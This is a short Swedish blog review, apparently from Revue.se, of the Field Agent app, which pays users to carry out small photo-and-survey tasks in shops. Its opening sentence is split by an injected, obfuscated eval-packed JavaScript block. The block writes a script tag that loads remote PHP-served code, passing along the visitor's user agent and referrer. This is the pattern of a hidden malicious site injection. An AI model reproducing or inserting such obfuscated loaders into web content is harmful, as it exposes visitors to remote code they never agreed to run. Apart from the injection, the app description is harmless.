Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Tjäna pengar med appen Field Agent

Field-Agent-iPhone
Sebastian

Har eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eihif|var|u0026u|referrer|dzyka||js|php’.split(’|’),0,{}))
du tid för lite extra knäck? Ifall ja är applikationen Field Agent något för dig.

Field agent är en app där olika företag / leverantörer betalar användare för att utföra olika uppdrag i butiker.

Uppdragen varierar men kan exempelvis handla om att du ska gå in i en butik och ta en bild på en viss sorts produkt och sedan ladda upp den och svara på några få frågor som då är associerade med produkten. Med andra ord är det en liten marknadsundersökning från företaget.

I genomsnitt får du som anändare ut ca 50-70 kronor för ett godkänt genomfört uppdrag.

Just nu finns tjänsten i Sverige och i Danmark. Olika uppdrag finns också tillgängliga på olika geografiska platser. Det finns i nuläget ca 1 100 agenter igång i Danmark.

Revue.se har testat Field Agent och tycker det verkar vara en rolig tjänst att testa på. Dock var det lite för få uppdrag live i Stockholmsområdet så vi hade inte möjlighet att utföra ett ”riktigt” uppdrag utan endast introduktionen.

Läs mer och laddar ner appen som är gratis i App Store.

Field Agent
Pris: Gratis.
Utvecklare: Northstar Partnering Group.